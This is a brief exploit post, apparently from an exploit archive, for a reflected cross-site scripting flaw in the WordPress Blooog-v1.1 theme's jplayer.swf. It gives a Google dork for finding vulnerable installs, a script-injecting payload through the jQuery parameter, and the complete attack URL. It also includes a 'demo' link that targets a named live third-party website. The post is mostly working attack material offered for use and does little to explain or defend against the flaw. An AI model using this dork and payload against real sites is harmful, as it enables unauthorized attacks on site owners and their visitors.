X-------------------------------------------------------------X _____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________ |_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \ | | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ / | | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| / | | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \ \_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_| X-------------------------------------------------------------X [+] Author: TUNISIAN CYBER [+] Exploit Title: WordPress Blooog-v1.1 Theme Cross Site Scripting [+] Date: 2-12-2013 [+] Category: WebApp [+] Google Dork: inurl:"wp-content/themes/Blooog-v1.1" [+] Tested on: Win7 , ubuntu 13.04 ######################################################################################## P.O.C: http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf P4yl04D: ?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)// The link will be like this: http: //127.0.0.1/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day TUNISIAN CYBER/)// Demo:(the rest at google,bing..) http://www.951collegeradio.com/wp-content/themes/Blooog-v1.1/assets/js/jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(/1337day%20TUNISIAN%20CYBER/)// img:http://oi40.tinypic.com/33k6sqq.jpg ########################################################################################